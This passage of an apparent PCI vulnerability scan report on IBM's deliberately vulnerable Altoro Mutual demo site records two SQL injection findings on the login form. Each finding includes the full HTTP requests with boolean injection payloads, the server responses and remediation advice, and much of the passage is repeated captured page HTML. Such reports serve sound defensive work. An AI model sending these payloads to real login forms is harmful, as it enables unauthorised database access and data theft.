<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 170 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 171 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a id="CatLink2" class="subheader" href="index.jsp?
content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 172 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 173 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 174 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 175 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 176 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

12 SQL Injection Vulnerability 7.5 High Fail URL: http://demo.testfire.net/doLogin


Port: tcp/80

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 177 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:34:47 GMT
Connection: close

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 178 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-
serif;color:black;background-color:white;} B {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;} P {font-family:Tahoma,Arial,sans-
serif;background:white;color:black;font-size:12px;}A {color :
black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
False Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:34:47 GMT

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 179 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 180 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 181 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 182 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 183 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 184 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 185 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 186 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 187 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

13 SQL Injection Vulnerability 7.5 High Fail URL: https://demo.testfire.net/doLogin


Port: tcp/443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 188 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:31:43 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-family:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 189 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-
size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-
serif;color:black;background-color:white;} B {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;} P {font-family:Tahoma,Arial,sans-
serif;background:white;color:black;font-size:12px;}A {color :
black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
False Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:31:43 GMT

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 190 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
